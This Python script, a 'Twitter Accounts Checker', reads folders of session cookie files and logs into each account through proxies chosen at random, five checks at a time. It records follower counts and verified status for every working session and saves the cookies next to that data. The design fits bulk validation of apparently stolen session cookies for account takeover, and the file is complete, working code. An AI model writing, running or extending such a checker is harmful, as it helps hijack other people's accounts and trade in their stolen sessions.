def scan_cookies_directory(dir_path: str) -> List[Path]:
    """Resolve a path to a sorted list of cookie files.

    A file path is returned as a single-element list; a directory is
    scanned (non-recursively) for *.json and *.txt files.

    Args:
        dir_path: Path to a directory with cookies, or a single file.

    Returns:
        Sorted list of Path objects to cookie files.

    Raises:
        FileNotFoundError: If the path exists neither as given nor
            relative to the current directory.
    """
    path = Path(dir_path).expanduser().resolve()
    if not path.exists():
        # Second chance: interpret the argument relative to the CWD.
        path = Path.cwd() / dir_path
        if not path.exists():
            raise FileNotFoundError(f"Path not found: {dir_path}")

    if path.is_file():
        return [path]

    cookie_files: List[Path] = []
    for pattern in ('*.json', '*.txt'):
        cookie_files.extend(path.glob(pattern))
    return sorted(cookie_files)


async def authenticate_twitter(cookies: Union[str, Dict], proxy: Optional[Proxy] = None) -> TwitterAsync:
    """Authenticate to Twitter using cookies.

    Args:
        cookies: Cookie string or dictionary.
        proxy: Optional proxy configuration.

    Returns:
        Authenticated TwitterAsync instance.
    """
    print(f"\n🔐 Authenticating with Twitter...")
    if proxy:
        app = TwitterAsync("temp_session", proxy=proxy)
    else:
        app = TwitterAsync("temp_session")
    await app.load_cookies(cookies)
    return app


def _user_field(user, name: str, default=None):
    """Read a field from either a tweety user object or a raw user dict."""
    if isinstance(user, dict):
        return user.get(name, default)
    return getattr(user, name, default)


def save_account_info(user, cookie_file: Path, output_dir: Path, cleaned_cookies: str = None) -> Path:
    """Save account information to a text file in `output_dir`.

    BUG FIX: the original accessed `user.username` / `user.verified` as
    attributes before its `isinstance(user, dict)` branches, so a dict user
    would have crashed and the dict handling was unreachable. All field
    access now goes through `_user_field`, which supports both shapes.

    Args:
        user: User object from tweety (or a raw user dict).
        cookie_file: Original cookie file path (recorded in the output).
        output_dir: Output directory (created if missing).
        cleaned_cookies: Cleaned cookie content; when omitted the original
            file content is embedded instead.

    Returns:
        Path of the written info file.
    """
    output_dir.mkdir(exist_ok=True)

    username = _user_field(user, 'username') or _user_field(user, 'screen_name', 'unknown')
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    info_file = output_dir / f"{username}_{timestamp}_info.txt"

    # Verification metadata arrives in several shapes depending on the payload.
    verified_type = None
    verified_label = None
    if isinstance(user, dict):
        verified_type = user.get('verified_type') or user.get('ext_verified_type')
        verified_label = user.get('verified_label')
        legacy = user.get('legacy')
        if isinstance(legacy, dict) and not verified_type:
            verified_type = legacy.get('verified_type')
        if user.get('ext_is_blue_verified'):
            verified_type = verified_type or 'Blue'

    # Embed the cleaned cookies when supplied, otherwise the raw file content.
    if cleaned_cookies:
        cookie_content = cleaned_cookies
    else:
        cookie_content = cookie_file.read_text(encoding='utf-8')

    verification_parts = []
    if _user_field(user, 'verified'):
        verification_parts.append("Verified: Yes")
        if verified_type:
            verification_parts.append(f"Type: {verified_type}")
        if verified_label:
            verification_parts.append(f"Label: {verified_label}")
    else:
        verification_parts.append("Verified: No")
    verification_line = " | ".join(verification_parts)

    # created_at may be a datetime or a string -- presumably ISO-ish; TODO confirm.
    created_at = _user_field(user, 'created_at')
    try:
        if isinstance(created_at, str):
            # Optional third-party dependency; any failure falls through below.
            from dateutil import parser
            created_str = parser.parse(created_at).strftime("%d.%m.%Y %H:%M")
        else:
            created_str = created_at.strftime("%d.%m.%Y %H:%M")
    except Exception:  # was a bare `except:` -- narrowed so SystemExit/KeyboardInterrupt pass through
        created_str = str(created_at)

    info_lines = [
        "=" * 80,
        f"Checked: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}",
        "",
        f"ID: {_user_field(user, 'id')} | Name: {_user_field(user, 'name')} | Username: @{username}",
        f"Followers: {_user_field(user, 'followers_count', 0):,} | Following: {_user_field(user, 'friends_count', 0):,}",
        f"Tweets: {_user_field(user, 'statuses_count', 0):,} | Likes: {_user_field(user, 'favourites_count', 0):,}",
        verification_line,
        f"Created: {created_str}",
        f"Profile: https://twitter.com/{username}",
        "",
        f"Cookie file: {cookie_file.absolute()}",
        "",
        "=" * 80,
        cookie_content,
    ]
    info_file.write_text('\n'.join(info_lines), encoding='utf-8')
    return info_file


async def check_account(cookie_file: Path, proxies: List[Proxy], output_dir: Path, semaphore: asyncio.Semaphore):
    """Check a single account asynchronously.

    Concurrency is bounded by `semaphore`. This coroutine never raises:
    every failure is reported through the return value.

    Args:
        cookie_file: Path to the cookie file.
        proxies: List of available proxies (one is chosen at random).
        output_dir: Output directory for account-info files.
        semaphore: Semaphore for concurrency control.

    Returns:
        Tuple of (success: bool, verified: bool, message: str).
    """
    async with semaphore:
        try:
            # Parse the cookie file.
            try:
                cookies_string = read_cookies_file(str(cookie_file))
                if not cookies_string:
                    return (False, False, "Failed to parse cookie file")
                # Cleaned content is embedded in the saved results.
                cleaned_content = clean_cookie_content(cookie_file.read_text(encoding='utf-8'))
            except Exception as e:
                return (False, False, f"Failed to read cookies: {e}")

            # Pick a random proxy when any are configured.
            proxy = random.choice(proxies) if proxies else None

            try:
                app = await authenticate_twitter(cookies_string, proxy)
            except Exception as e:
                return (False, False, f"Authentication error: {e}")

            # Inspect the authenticated session.
            try:
                if not app.me:
                    return (False, False, "Authentication failed - invalid cookies")
                user = app.me
                is_verified = user.verified
                try:
                    save_account_info(user, cookie_file, output_dir, cleaned_content)
                except Exception:
                    pass  # best-effort: a failed results write must not fail the check
                return (True, is_verified, f"@{user.username}")
            except Exception as e:
                return (False, False, f"Error processing user info: {e}")
        except Exception as e:
            # Final safety net so one account can never abort the whole run.
            return (False, False, f"Unexpected error: {e}")


async def main():
    """CLI entry point: scan cookie files, check all accounts, write a summary."""
    print("=" * 60)
    print("Twitter Accounts Checker")
    print("=" * 60)

    if len(sys.argv) < 2:
        # Restored the <cookies_dir> placeholder that was missing from the
        # usage line (it contradicted the argument docs below).
        print("\nUsage: python twitter_auth_cookies.py <cookies_dir> [proxy_file]")
        print("\nArguments:")
        print("  cookies_dir - Directory with cookie files (.json/.txt) or single file")
        print("  proxy_file  - Optional file with proxies (one per line)")
        print("\nProxy format:")
        print("  socks5://127.0.0.1:1080")
        print("  http://user:pass@proxy.com:8080")
        print("\nExamples:")
        print("  python twitter_auth_cookies.py cookies/")
        print("  python twitter_auth_cookies.py cookies/ proxies.txt")
        print("  python twitter_auth_cookies.py single_cookie.json proxies.txt")
        sys.exit(1)

    cookies_path = sys.argv[1]
    proxy_file = sys.argv[2] if len(sys.argv) > 2 else None

    output_dir = Path("results")
    output_dir.mkdir(exist_ok=True)

    try:
        print(f"\n📂 Scanning for cookies in: {cookies_path}")
        cookie_files = scan_cookies_directory(cookies_path)
        if not cookie_files:
            print("❌ No cookie files found (.json or .txt)")
            sys.exit(1)
        print(f"✓ Found {len(cookie_files)} cookie file(s)")

        proxies: List[Proxy] = []
        if proxy_file:
            print(f"\n🌐 Loading proxies from: {proxy_file}")
            proxies = read_proxy_file(proxy_file)
            if not proxies:
                print("⚠️ No valid proxies found, continuing without proxy")

        print(f"\n🔍 Starting account checks...")
        print("=" * 60)

        # At most 5 checks in flight at once.
        semaphore = asyncio.Semaphore(5)

        # BUG FIX: the original stored bare coroutines and awaited them one by
        # one, which ran every check strictly sequentially despite the
        # semaphore. asyncio.create_task() schedules them immediately so they
        # actually overlap; we still await in order for stable output.
        tasks = [
            (cookie_file, asyncio.create_task(check_account(cookie_file, proxies, output_dir, semaphore)))
            for cookie_file in cookie_files
        ]

        successful = 0
        failed = 0
        verified_count = 0
        for i, (cookie_file, task) in enumerate(tasks, 1):
            print(f"\n[{i}/{len(cookie_files)}] Checking: {cookie_file.name}")
            success, verified, msg = await task
            if success:
                print(f"  ✅ Success: {msg}")
                if verified:
                    print(f"     Verified: Yes")
                    verified_count += 1
                successful += 1
            else:
                print(f"  ❌ {msg}")
                failed += 1

        # Console summary.
        print("\n" + "=" * 60)
        print("Summary:")
        print("=" * 60)
        print(f"Total accounts: {len(cookie_files)}")
        print(f"✅ Valid: {successful}")
        print(f"❌ Failed: {failed}")
        print(f"✓ Verified: {verified_count}")
        print(f"\n📁 Results saved to: {output_dir.absolute()}/")
        print("=" * 60)

        # Persist the summary next to the per-account results.
        summary_file = output_dir / f"summary_{datetime.now().strftime('%Y%m%d_%H%M%S')}.txt"
        summary_lines = [
            "=" * 80,
            "Twitter Checker Summary",
            "=" * 80,
            f"Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}",
            "",
            "Results:",
            f"  Total accounts checked: {len(cookie_files)}",
            f"  Valid accounts: {successful}",
            f"  Invalid accounts: {failed}",
            f"  Verified accounts: {verified_count}",
            "",
            "Configuration:",
            f"  Proxies loaded: {len(proxies) if proxies else 0}",
            f"  Cookie files: {len(cookie_files)}",
            "",
            "=" * 80,
        ]
        summary_file.write_text('\n'.join(summary_lines), encoding='utf-8')
        print(f"\n📊 Summary saved to: {summary_file.name}")

    except FileNotFoundError as e:
        print(f"\n❌ Error: {e}")
        sys.exit(1)
    except Exception as e:
        print(f"\n❌ Unexpected error: {e}")
        import traceback
        traceback.print_exc()
        sys.exit(1)


if __name__ == "__main__":
    asyncio.run(main())